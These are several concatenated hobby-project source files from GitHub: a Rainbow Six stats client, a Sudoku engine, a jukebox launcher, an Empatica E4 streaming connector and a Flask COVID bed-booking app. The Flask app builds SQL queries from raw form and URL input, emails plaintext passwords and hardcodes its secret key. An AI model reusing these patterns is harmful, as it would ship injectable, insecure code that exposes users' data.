} |
#### File: 1Blademaster/siegeStatsGrabber/auth.py
```python
import asyncio
import base64
import json
import os
from datetime import datetime, timedelta
import aiohttp
import requests
from colorama import Fore, Style
class Auth:
def __init__(self, email, password):
self.token = base64.b64encode((email + ":" + password).encode("utf-8")).decode("utf-8")
self.appId = '39baebad-39e5-4552-8c25-2c9b919064e2'
self.getAuthData()
def getAuthData(self):
headers = {
'Content-Type': 'application/json',
'Authorization': 'Basic ' + self.token,
'Ubi-AppId': self.appId
}
r = requests.post('https://public-ubiservices.ubi.com/v3/profiles/sessions', headers=headers)
respData = r.json()
self.ticket = respData['ticket']
self.sessionId = respData['sessionId']
self.sessionKey = respData['sessionKey']
self.spaceId = respData['spaceId']
self.ownUserId = respData['userId']
def getUserId(self, username):
if os.path.isfile('cachedNames.txt'):
with open('cachedNames.txt', 'r') as f:
for line in f.readlines():
_line = line.split(' : ')
if _line[0] == username:
return _line[1].strip()
else:
open('cachedNames.txt', 'w').close()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Ubi_v1 t=' + self.ticket,
'Ubi-AppId': self.appId,
'Ubi-SessionId': self.sessionId,
'Connection': 'keep-alive',
}
r = requests.get(f'https://public-ubiservices.ubi.com/v2/profiles?nameOnPlatform={username}&platformType=UPLAY', headers=headers)
try:
userId = r.json()['profiles'][0]['userId']
with open('cachedNames.txt', 'a') as f:
f.write(f'{username.strip()} : {userId}\n')
except:
print(f'{Fore.RED}[Error]{Style.RESET_ALL} Could not find the user ID for: {username}')
userId = None
return userId
def getLink(self, statType, username):
userId = self.getUserId(username)
if not userId: return False
if statType == 'summary':
return f'https://r6s-stats.ubisoft.com/v1/current/summary/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'seasonal':
return f'https://r6s-stats.ubisoft.com/v1/seasonal/summary/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'operator':
return f'https://r6s-stats.ubisoft.com/v1/current/operators/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&teamRole=attacker,defender&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'rank':
return f'https://public-ubiservices.ubi.com/v1/spaces/5172a557-50b5-4665-b7db-e3f2e8c5041d/sandboxes/OSBOR_PC_LNCH_A/r6karma/players?board_id=pvp_ranked&season_id=-1®ion_id=ncsa&profile_ids={userId}'
elif statType == 'map':
return f'https://r6s-stats.ubisoft.com/v1/current/maps/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'all':
return [
f'https://r6s-stats.ubisoft.com/v1/current/summary/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
f'https://r6s-stats.ubisoft.com/v1/seasonal/summary/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
f'https://r6s-stats.ubisoft.com/v1/current/operators/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&teamRole=attacker,defender&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
f'https://public-ubiservices.ubi.com/v1/spaces/5172a557-50b5-4665-b7db-e3f2e8c5041d/sandboxes/OSBOR_PC_LNCH_A/r6karma/players?board_id=pvp_ranked&season_id=-1®ion_id=ncsa&profile_ids={userId}',
f'https://r6s-stats.ubisoft.com/v1/current/maps/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
]
else:
print('{Fore.RED}[Error]{Style.RESET_ALL} Unknown stat type')
return False
async def fetchData(self, link):
headers = {
'Content-Type': 'application/json',
'Authorization': 'Ubi_v1 t=' + self.ticket,
'Ubi-AppId': self.appId,
'Ubi-SessionId': self.sessionId,
'Connection': 'keep-alive',
'expiration': f'{(datetime.now() + timedelta(hours=2)).strftime("%Y-%m-%dT%H:%M:%S")}.657Z'
}
if link:
async with aiohttp.ClientSession() as session:
async with session.get(link, headers=headers) as r:
if r.status == 200:
return await r.json()
else:
print(f'{Fore.RED}[Error]{Style.RESET_ALL} An error occured: ')
print(r.reason)
return False
else:
return False
``` |
{
"source": "1Blademaster/sudoku_engine",
"score": 4
} |
#### File: 1Blademaster/sudoku_engine/sudoku.py
```python
import copy
import random
class Board:
"""
__init__ [code (optional): string]:
Initilise the board object
boardToCode [input_board (optional): list]:
Convert a board represented by a list into a string representation
findSpaces []:
Finds the first empty space, represented by a 0, on the current board
checkSpace [num: integer, space: tuple]:
Returns a bool, depending if the number passed in can exist in a space on the current board, provided by the tuple argument
solve []:
Solves the current board using backtracking
solveForCode []:
Calls the solve method and returns the solved board in a string code format
generateQuestionBoardCode [difficulty: integer]:
Calls the generateQuestionBoard method and returns a question board and its solution in code format
generateQuestionBoard [fullBoard: list, difficulty: integer]:
Returns a randomly generated question board and the solution to the same board, the difficulty represents the number of number squares
removed from the board
__generateRandomCompleteBoard []:
Returns a full randomly generated board
__generateCont []:
Uses recursion to finish generating a full board, whilst also making sure the board is solvable by calling the solve method
findNumberOfSolutions []:
Finds the number of solutions to the current board and returns a list of all the solutions in code format
__findSpacesToFindNumberOfSolutions [board: list, h: integer]:
Finds the first empty space in the board given as the argument, used within the findNumberOfSolutions method
__solveToFindNumberOfSolutions [row: integer, col: interger]:
Solves the current board using recursion by starting at the position determined by the row and col, used within the findNumberOfSolutions method
__resetBoard []:
Resets the current board to an empty state
"""
def __init__(self, code=None):
self.__resetBoard()
if code: # create a board from the code inputted
self.code = code
for row in range(9):
for col in range(9):
self.board[row][col] = int(code[0])
code = code[1:]
else:
self.code = None
def boardToCode(self, input_board=None): # turn a pre-existing board into a code
if input_board:
_code = ''.join([str(i) for j in input_board for i in j])
return _code
else:
self.code = ''.join([str(i) for j in self.board for i in j])
return self.code
def findSpaces(self): # finds the first empty space in the board; where there is not a number
for row in range(len(self.board)):
for col in range(len(self.board[0])):
if self.board[row][col] == 0:
return (row, col)
return False
def checkSpace(self, num, space): #checks to see if a number can be fitted into a specifc space; row, col
if not self.board[space[0]][space[1]] == 0: # check to see if space is a number already
return False
for col in self.board[space[0]]: # check to see if number is already in row
if col == num:
return False
for row in range(len(self.board)): # check to see if number is already in column
if self.board[row][space[1]] == num:
return False
_internalBoxRow = space[0] // 3
_internalBoxCol = space[1] // 3
for i in range(3): # check to see if internal box already has number
for j in range(3):
if self.board[i + (_internalBoxRow * 3)][j + (_internalBoxCol * 3)] == num:
return False
return True
def solve(self): # solves a board using recursion
_spacesAvailable = self.findSpaces()
if not _spacesAvailable:
return True
else:
row, col = _spacesAvailable
for n in range(1, 10):
if self.checkSpace(n, (row, col)):
self.board[row][col] = n
if self.solve():
return self.board
self.board[row][col] = 0
return False
def solveForCode(self): # solves a board and returns the code of the solved board
return self.boardToCode(self.solve())
def generateQuestionBoardCode(self, difficulty): # generates a new random board and its board code depending on the difficulty
self.board, _solution_board = self.generateQuestionBoard(self.__generateRandomCompleteBoard(), difficulty)
return self.boardToCode(), self.boardToCode(_solution_board)
def generateQuestionBoard(self, fullBoard, difficulty): # generates a question board with a certain amount of numbers removed depending on the chosen difficulty
self.board = copy.deepcopy(fullBoard)
if difficulty == 0:
_squares_to_remove = 36
elif difficulty == 1:
_squares_to_remove = 46
elif difficulty == 2:
_squares_to_remove = 52
else:
return
_counter = 0
while _counter < 4:
_rRow = random.randint(0, 2)
_rCol = random.randint(0, 2)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_counter = 0
while _counter < 4:
_rRow = random.randint(3, 5)
_rCol = random.randint(3, 5)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_counter = 0
while _counter < 4:
_rRow = random.randint(6, 8)
_rCol = random.randint(6, 8)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_squares_to_remove -= 12
_counter = 0
while _counter < _squares_to_remove:
_row = random.randint(0, 8)
_col = random.randint(0, 8)
if self.board[_row][_col] != 0:
n = self.board[_row][_col]
self.board[_row][_col] = 0
if len(self.findNumberOfSolutions()) != 1:
self.board[_row][_col] = n
continue
_counter += 1
return self.board, fullBoard
def __generateRandomCompleteBoard(self): # generates a brand new completely random board full of numbers
self.__resetBoard()
_l = list(range(1, 10))
for row in range(3):
for col in range(3):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
_l = list(range(1, 10))
for row in range(3, 6):
for col in range(3, 6):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
_l = list(range(1, 10))
for row in range(6, 9):
for col in range(6, 9):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
return self.__generateCont()
def __generateCont(self): # uses recursion to finish generating a random board
for row in range(len(self.board)):
for col in range(len(self.board[row])):
if self.board[row][col] == 0:
_num = random.randint(1, 9)
if self.checkSpace(_num, (row, col)):
self.board[row][col] = _num
if self.solve():
self.__generateCont()
return self.board
self.board[row][col] = 0
return False
def findNumberOfSolutions(self): # finds the number of solutions to a board and returns the list of solutions
_z = 0
_list_of_solutions = []
for row in range(len(self.board)):
for col in range(len(self.board[row])):
if self.board[row][col] == 0:
_z += 1
for i in range(1, _z+1):
_board_copy = copy.deepcopy(self)
_row, _col = self.__findSpacesToFindNumberOfSolutions(_board_copy.board, i)
_board_copy_solution = _board_copy.__solveToFindNumberOfSolutions(_row, _col)
_list_of_solutions.append(self.boardToCode(input_board=_board_copy_solution))
return list(set(_list_of_solutions))
def __findSpacesToFindNumberOfSolutions(self, board, h): # finds the first empty space it comes across, is used within the findNumberOfSolutions method
_k = 1
for row in range(len(board)):
for col in range(len(board[row])):
if board[row][col] == 0:
if _k == h:
return (row, col)
_k += 1
return False
def __solveToFindNumberOfSolutions(self, row, col): # solves the board using recursion, is used within the findNumberOfSolutions method
for n in range(1, 10):
if self.checkSpace(n, (row, col)):
self.board[row][col] = n
if self.solve():
return self.board
self.board[row][col] = 0
return False
def __resetBoard(self): # resets the board to an empty state
self.board = [
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
]
return self.board
if __name__ == '__main__':
board = Board()
question_board_code = board.generateQuestionBoardCode(1) # generates a medium level sudoku
print(question_board_code[0])
code = '300105000060200000008090060050000800800007040071009035000900084704006000902048300'
solved_board_code = Board(code).solveForCode() # solves a hard level sudoku
``` |
{
"source": "1bod/ProjetJukebox",
"score": 3
} |
#### File: 1bod/ProjetJukebox/main.py
```python
from threading import Thread
import monstercat_api
import interface
import fenetre
def startup(objet_fenetre:interface.Chargement):
"""Fonction de démarrage du programme"""
threads = []
results= []
releases=monstercat_api.get_releases()
# création de la liste des sorties à afficher
sorties=[] #sorties[] = (CatalogId, AudioPath, CoverPath)
nombre_telecharge=0
for sortie in releases["Releases"]["Data"]:
if sortie["Streamable"] is True and nombre_telecharge<12:
nombre_telecharge+=1
thread = Thread(target=monstercat_api.get_track, args=(sortie["CatalogId"],"chansons","images", results))
threads.append(thread)
try:
objet_fenetre.add_progress(10)
objet_fenetre.update_idletasks()
except: # pylint: disable=bare-except
pass
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for result in results:
sorties.append((sortie["CatalogId"],result[0],result[1]))
# audio_path, image_path = monstercat_api.get_track(sortie["CatalogId"],"chansons","images")
#sorties.append((sortie["CatalogId"],audio_path, image_path))
objet_fenetre.destroy()
fenetre.demarrage()
if __name__ == "__main__":
chargement=interface.Chargement("Téléchargement des derniers titres...", callback=startup)
chargement.start()
``` |
{
"source": "1bubneb/streaminghub",
"score": 2
} |
#### File: streaminghub/connectors/empatica_e4.py
```python
import codecs
import socket
import numpy as np
# constants
from lsl_outlet import create_outlet
BUFFER_SIZE = 4096
# acc - 3 - axis acceleration
# bvp - Blood Volume Pulse
# gsr - Galvanic Skin Response
# ibi - Inter-Beat Interval and Heartbeat
# tmp - Skin Temperature
# bat - Device Battery
# tag - Tag taken from the device
STREAMS = ['acc', 'bvp', 'gsr', 'tmp', 'ibi', 'bat', 'tag']
STREAM_IDS = ['E4_Acc', 'E4_Bvp', 'E4_Gsr', 'E4_Temperature', 'E4_Ibi', 'E4_Hr', 'E4_Battery', 'E4_Tag']
TAGS = []
# states
class STATES:
NEW__ = 'new'
WAITING__ = 'waiting'
NO_DEVICES__ = 'no_devices'
DEVICES_FOUND__ = 'devices_found'
CONNECTED_TO_DEVICE__ = "connected"
READY_TO_SUBSCRIBE__ = "ready_to_subscribe"
SUBSCRIBE_COMPLETED__ = "subscribe completed"
STREAMING__ = 'streaming'
# commands
class COMMANDS:
DEVICE_LIST__ = 'device_list'
DEVICE_CONNECT__ = 'device_connect'
DEVICE_SUBSCRIBE__ = 'device_subscribe'
PAUSE__ = "pause"
channel_description = {
'E4_Acc_x': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Acc_y': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Acc_z': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Bvp': {
'unit': '',
'type': '',
'freq': '64'
},
'E4_Ibi': {
'unit': 'ms',
'type': 'interval',
'freq': 'N/A'
},
'E4_Gsr': {
'unit': '',
'type': '',
'freq': '4'
},
'E4_Temperature': {
'unit': '',
'type': '',
'freq': '4'
},
'E4_Hr': {
'unit': '',
'type': '',
'freq': 'N/A'
},
'E4_Battery': {
'unit': '',
'type': '',
'freq': '64'
},
'E4_Tag': {
'unit': '',
'type': '',
'freq': '64'
}
}
OUTLET = create_outlet('Empatica_E4', 'wristband', channel_description, 'Empatica', 'E4', '1234567890')
# State
STATE = STATES.NEW__
DEVICE = None
stream_i = 0
class DataStream:
sample = []
# init sample array with NaN values
for i in range(0,10):
sample.append(np.nan)
def process_data_stream(cmd: str):
d = next(filter(lambda x: cmd.startswith(x), STREAM_IDS), None)
if d is not None:
# data stream. handle accordingly
try:
if d == 'E4_Acc':
t, x, y, z = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[0:3] = [x, y, z]
OUTLET.push_sample(sample, t)
elif d == 'E4_Bvp':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[3] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Gsr':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[4] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Temperature':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[5] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Ibi':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[6] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Hr':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[7] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Battery':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[8] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Tag':
t = [float(n) for n in cmd.split(' ')[1]]
if OUTLET.have_consumers():
sample[9] = v
OUTLET.push_sample(sample, t)
print('.', end='', flush=True)
except Exception as e:
print('Error: ', e)
else:
# some other message
print('Unknown message: %s' % cmd)
DS = DataStream
def msg(s_: str) -> bytes:
return codecs.encode(s_ + '\r\n')
def set_devices_connected(num: int, devices: list):
global DEVICE
print('%d device(s) found: %s' % (num, ', '.join([id_ for id_, name_ in devices])))
set_state(STATES.NO_DEVICES__ if num == 0 else STATES.DEVICES_FOUND__)
if num > 1:
# ask user to select device
id_ = input('Select device id: ')
if id_ in [y for x, y in devices]:
DEVICE = id_
else:
print('Invalid device id')
exit(1)
elif num == 1:
id_ = devices[0][0]
print('Selecting %s' % id_)
DEVICE = id_
def set_state(state: str):
global STATE
STATE = state
def process_incoming_msgs():
global stream_i
in_msg: str = codecs.decode(s.recv(BUFFER_SIZE))
# parse message(s)
in_msg_cmds = [x.strip() for x in in_msg.split('\r\n')]
for cmd in in_msg_cmds:
if len(cmd) == 0 or cmd.find(' ') == -1:
continue
# Handle responses to request
if cmd[0] == 'R':
cmd = cmd[2:]
i = cmd.find(' ')
# DEVICE_LIST response
if cmd[:i] == COMMANDS.DEVICE_LIST__:
cmd = cmd[i + 1:]
# list devices connected
i = cmd.find(' ')
num = int(cmd[:i]) if i != -1 else 0
devices = []
if num > 0:
cmds = cmd[i + 3:].split(' | ')
if len(cmds) != num:
print('device count mismatch')
exit(1)
devices = [x.split(' ') for x in cmds]
set_devices_connected(num, devices)
# DEVICE_CONNECT response
elif cmd[:i] == COMMANDS.DEVICE_CONNECT__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error connecting to device: %s' % cmd)
exit(1)
elif status == "OK":
print('Connected to device')
set_state(STATES.CONNECTED_TO_DEVICE__)
# PAUSE response
elif cmd[:i] == COMMANDS.PAUSE__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error pausing streaming: %s' % cmd)
exit(1)
elif status == "ON":
print('Streaming on hold')
set_state(STATES.READY_TO_SUBSCRIBE__)
elif status == "OFF":
print('Streaming started')
set_state(STATES.STREAMING__)
# DEVICE SUBSCRIBE response
elif cmd[:i] == COMMANDS.DEVICE_SUBSCRIBE__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
stream_type = cmd[:i]
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error subscribing to stream %s: %s' % (stream_type, cmd))
exit(1)
elif status == "OK":
print('Subscribed: %s' % stream_type)
stream_i += 1
if stream_i == len(STREAMS):
set_state(STATES.SUBSCRIBE_COMPLETED__)
else:
set_state(STATES.READY_TO_SUBSCRIBE__)
# Handle data stream
elif STATE == STATES.STREAMING__:
process_data_stream(cmd)
def handle_outgoing_msgs():
if STATE == STATES.NEW__:
# request devices list
print('Getting list of devices...')
s.send(msg(COMMANDS.DEVICE_LIST__))
set_state(STATES.WAITING__)
elif STATE == STATES.NO_DEVICES__:
print('No devices found!')
exit(1)
elif STATE == STATES.DEVICES_FOUND__:
# connect to device
print('Connecting to device...')
s.send(msg("%s %s" % (COMMANDS.DEVICE_CONNECT__, DEVICE)))
set_state(STATES.WAITING__)
elif STATE == STATES.CONNECTED_TO_DEVICE__:
# pause streaming initially
print('Initializing...')
s.send(msg("%s ON" % COMMANDS.PAUSE__))
set_state(STATES.WAITING__)
elif STATE == STATES.READY_TO_SUBSCRIBE__:
# subscribe to streams
stream = STREAMS[stream_i]
print('Subscribing to stream: %s' % stream)
s.send(msg("%s %s ON" % (COMMANDS.DEVICE_SUBSCRIBE__, stream)))
set_state(STATES.WAITING__)
elif STATE == STATES.SUBSCRIBE_COMPLETED__:
# begin streaming data
print('Requesting data')
s.send(msg("%s OFF" % COMMANDS.PAUSE__))
set_state(STATES.STREAMING__)
if __name__ == '__main__':
# Create socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.211.55.3", 28000))
# event loop
while True:
handle_outgoing_msgs()
process_incoming_msgs()
``` |
{
"source": "1by19is169/Covid-Bed-Slot-Booking-System",
"score": 2
} |
#### File: 1by19is169/Covid-Bed-Slot-Booking-System/main.py
```python
from flask import Flask, json,redirect,render_template,flash,request
from flask.globals import request, session
from flask.helpers import url_for
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import login_required,logout_user,login_user,login_manager,LoginManager,current_user
from flask_mail import Mail
import json
# mydatabase connection
local_server=True
app=Flask(__name__)
app.secret_key="168and169"
with open('config.json','r') as c:
params=json.load(c)["params"]
app.config.update(
MAIL_SERVER='smtp.gmail.com',
MAIL_PORT='465',
MAIL_USE_SSL=True,
MAIL_USERNAME=params['gmail-user'],
MAIL_PASSWORD=params['<PASSWORD>']
)
mail = Mail(app)
# this is for getting the unique user access
login_manager=LoginManager(app)
login_manager.login_view='login'
# app.config['SQLALCHEMY_DATABASE_URI']='mysql://username:password@localhost/databsename'
app.config['SQLALCHEMY_DATABASE_URI']='mysql://root:@localhost/covid'
db=SQLAlchemy(app)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id)) or Hospitaluser.query.get(int(user_id))
class Test(db.Model):
id=db.Column(db.Integer,primary_key=True)
name=db.Column(db.String(50))
class User(UserMixin,db.Model):
id=db.Column(db.Integer,primary_key=True)
srfid=db.Column(db.String(20),unique=True)
email=db.Column(db.String(50))
dob=db.Column(db.String(1000))
class Hospitaluser(UserMixin,db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20))
email=db.Column(db.String(50))
password=db.Column(db.String(1000))
class Hospitaldata(db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20),unique=True)
hname=db.Column(db.String(100))
normalbed=db.Column(db.Integer)
hicubed=db.Column(db.Integer)
icubed=db.Column(db.Integer)
vbed=db.Column(db.Integer)
class Trig(db.Model):
id=db.Column(db.Integer,primary_key=True)
hcode=db.Column(db.String(20))
normalbed=db.Column(db.Integer)
hicubed=db.Column(db.Integer)
icubed=db.Column(db.Integer)
vbed=db.Column(db.Integer)
querys=db.Column(db.String(50))
date=db.Column(db.String(50))
class Bookingpatient(db.Model):
id=db.Column(db.Integer,primary_key=True)
srfid=db.Column(db.String(20),unique=True)
bedtype=db.Column(db.String(100))
hcode=db.Column(db.String(20))
spo2=db.Column(db.Integer)
pname=db.Column(db.String(100))
pphone=db.Column(db.String(100))
paddress=db.Column(db.String(100))
@app.route("/")
def home():
return render_template("index.html")
@app.route("/trigers")
def trigers():
query=Trig.query.all()
return render_template("trigers.html",query=query)
@app.route('/signup',methods=['POST','GET'])
def signup():
if request.method=="POST":
srfid=request.form.get('srf')
email=request.form.get('email')
dob=request.form.get('dob')
# print(srfid,email,dob)
encpassword=generate_password_hash(dob)
user=User.query.filter_by(srfid=srfid).first()
emailUser=User.query.filter_by(email=email).first()
if user or emailUser:
flash("Email or srif is already taken","warning")
return render_template("usersignup.html")
new_user=db.engine.execute(f"INSERT INTO `user` (`srfid`,`email`,`dob`) VALUES ('{srfid}','{email}','{encpassword}') ")
flash("SignUp Success Please Login","success")
return render_template("userlogin.html")
return render_template("usersignup.html")
@app.route('/login',methods=['POST','GET'])
def login():
if request.method=="POST":
srfid=request.form.get('srf')
dob=request.form.get('dob')
user=User.query.filter_by(srfid=srfid).first()
if user and check_password_hash(user.dob,dob):
login_user(user)
flash("Login Success","info")
return render_template("index.html")
else:
flash("Invalid Credentials","danger")
return render_template("userlogin.html")
return render_template("userlogin.html")
@app.route('/hospitallogin',methods=['POST','GET'])
def hospitallogin():
if request.method=="POST":
email=request.form.get('email')
password=request.form.get('password')
user=Hospitaluser.query.filter_by(email=email).first()
if user and check_password_hash(user.password,password):
login_user(user)
flash("Login Success","info")
return render_template("index.html")
else:
flash("Invalid Credentials","danger")
return render_template("hospitallogin.html")
return render_template("hospitallogin.html")
@app.route('/admin',methods=['POST','GET'])
def admin():
if request.method=="POST":
username=request.form.get('username')
password=request.form.get('password')
if(username==params['user'] and password==params['password']):
session['user']=username
flash("login success","info")
return render_template("addHosUser.html")
else:
flash("Invalid Credentials","danger")
return render_template("admin.html")
@app.route('/logout')
@login_required
def logout():
logout_user()
flash("Logout SuccessFul","warning")
return redirect(url_for('login'))
@app.route('/addHospitalUser',methods=['POST','GET'])
def hospitalUser():
if('user' in session and session['user']==params['user']):
if request.method=="POST":
hcode=request.form.get('hcode')
email=request.form.get('email')
password=request.form.get('password')
encpassword=generate_password_hash(password)
hcode=hcode.upper()
emailUser=Hospitaluser.query.filter_by(email=email).first()
if emailUser:
flash("Email or srif is already taken","warning")
db.engine.execute(f"INSERT INTO `hospitaluser` (`hcode`,`email`,`password`) VALUES ('{hcode}','{email}','{encpassword}') ")
# my mail starts from here if you not need to send mail comment the below line
mail.send_message('COVID CARE CENTER',sender=params['gmail-user'],recipients=[email],body=f"Welcome thanks for choosing us\nYour Login Credentials Are:\n Email Address: {email}\nPassword: {password}\n\nHospital Code {hcode}\n\n Do not share your password\n\n\nThank You..." )
flash("Data Sent and Inserted Successfully","warning")
return render_template("addHosUser.html")
else:
flash("Login and try Again","warning")
return render_template("addHosUser.html")
# testing wheather db is connected or not
@app.route("/test")
def test():
try:
a=Test.query.all()
print(a)
return f'MY DATABASE IS CONNECTED'
except Exception as e:
print(e)
return f'MY DATABASE IS NOT CONNECTED {e}'
@app.route("/logoutadmin")
def logoutadmin():
session.pop('user')
flash("You are logout admin", "primary")
return redirect('/admin')
@app.route("/addhospitalinfo",methods=['POST','GET'])
def addhospitalinfo():
email=current_user.email
posts=Hospitaluser.query.filter_by(email=email).first()
code=posts.hcode
postsdata=Hospitaldata.query.filter_by(hcode=code).first()
if request.method=="POST":
hcode=request.form.get('hcode')
hname=request.form.get('hname')
nbed=request.form.get('normalbed')
hbed=request.form.get('hicubeds')
ibed=request.form.get('icubeds')
vbed=request.form.get('ventbeds')
hcode=hcode.upper()
huser=Hospitaluser.query.filter_by(hcode=hcode).first()
hduser=Hospitaldata.query.filter_by(hcode=hcode).first()
if hduser:
flash("Data is already Present you can update it..","primary")
return render_template("hospitaldata.html")
if huser:
db.engine.execute(f"INSERT INTO `hospitaldata` (`hcode`,`hname`,`normalbed`,`hicubed`,`icubed`,`vbed`) VALUES ('{hcode}','{hname}','{nbed}','{hbed}','{ibed}','{vbed}')")
flash("Data Is Added","primary")
else:
flash("Hospital Code not Exist","warning")
return render_template("hospitaldata.html",postsdata=postsdata)
@app.route("/hedit/<string:id>",methods=['POST','GET'])
@login_required
def hedit(id):
posts=Hospitaldata.query.filter_by(id=id).first()
if request.method=="POST":
hcode=request.form.get('hcode')
hname=request.form.get('hname')
nbed=request.form.get('normalbed')
hbed=request.form.get('hicubeds')
ibed=request.form.get('icubeds')
vbed=request.form.get('ventbeds')
hcode=hcode.upper()
db.engine.execute(f"UPDATE `hospitaldata` SET `hcode` ='{hcode}',`hname`='{hname}',`normalbed`='{nbed}',`hicubed`='{hbed}',`icubed`='{ibed}',`vbed`='{vbed}' WHERE `hospitaldata`.`id`={id}")
flash("Slot Updated","info")
return redirect("/addhospitalinfo")
# posts=Hospitaldata.query.filter_by(id=id).first()
return render_template("hedit.html",posts=posts)
@app.route("/hdelete/<string:id>",methods=['POST','GET'])
@login_required
def hdelete(id):
db.engine.execute(f"DELETE FROM `hospitaldata` WHERE `hospitaldata`.`id`={id}")
flash("Date Deleted","danger")
return redirect("/addhospitalinfo")
@app.route("/pdetails",methods=['GET'])
@login_required
def pdetails():
code=current_user.srfid
print(code)
data=Bookingpatient.query.filter_by(srfid=code).first()
return render_template("detials.html",data=data)
@app.route("/slotbooking",methods=['POST','GET'])
@login_required
def slotbooking():
query=db.engine.execute(f"SELECT * FROM `hospitaldata` ")
if request.method=="POST":
srfid=request.form.get('srfid')
bedtype=request.form.get('bedtype')
hcode=request.form.get('hcode')
spo2=request.form.get('spo2')
pname=request.form.get('pname')
pphone=request.form.get('pphone')
paddress=request.form.get('paddress')
check2=Hospitaldata.query.filter_by(hcode=hcode).first()
if not check2:
flash("Hospital Code not exist","warning")
code=hcode
dbb=db.engine.execute(f"SELECT * FROM `hospitaldata` WHERE `hospitaldata`.`hcode`='{code}' ")
bedtype=bedtype
if bedtype=="NormalBed":
for d in dbb:
seat=d.normalbed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.normalbed=seat-1
db.session.commit()
elif bedtype=="HICUBed":
for d in dbb:
seat=d.hicubed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.hicubed=seat-1
db.session.commit()
elif bedtype=="ICUBed":
for d in dbb:
seat=d.icubed
print(seat)
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.icubed=seat-1
db.session.commit()
elif bedtype=="VENTILATORBed":
for d in dbb:
seat=d.vbed
ar=Hospitaldata.query.filter_by(hcode=code).first()
ar.vbed=seat-1
db.session.commit()
else:
pass
check=Hospitaldata.query.filter_by(hcode=hcode).first()
if(seat>0 and check):
res=Bookingpatient(srfid=srfid,bedtype=bedtype,hcode=hcode,spo2=spo2,pname=pname,pphone=pphone,paddress=paddress)
db.session.add(res)
db.session.commit()
flash("Slot is Booked kindly Visit Hospital for Further Procedure","success")
else:
flash("Something Went Wrong","danger")
return render_template("booking.html",query=query)
app.run(debug=True)
``` |
{
"source": "1byte2bytes/cpython",
"score": 3
} |
#### File: Demo/dns/dnsclass.py
```python
IN = 1 # the Internet
CS = 2 # the CSNET class (Obsolete - used only for examples in
# some obsolete RFCs)
CH = 3 # the CHAOS class
HS = 4 # Hesiod [Dyer 87]
# QCLASS values (section 3.2.5)
ANY = 255 # any class
# Construct reverse mapping dictionary
_names = dir()
classmap = {}
for _name in _names:
if _name[0] != '_': classmap[eval(_name)] = _name
def classstr(klass):
if classmap.has_key(klass): return classmap[klass]
